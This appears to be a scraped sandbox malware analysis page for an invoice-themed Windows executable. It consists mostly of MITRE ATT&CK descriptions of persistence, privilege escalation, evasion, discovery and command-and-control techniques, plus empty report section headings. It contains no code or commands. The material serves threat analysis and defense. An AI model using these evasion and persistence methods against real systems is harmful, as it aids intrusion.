Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report CN-Invoice-XXXXX9808-19011143287989.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre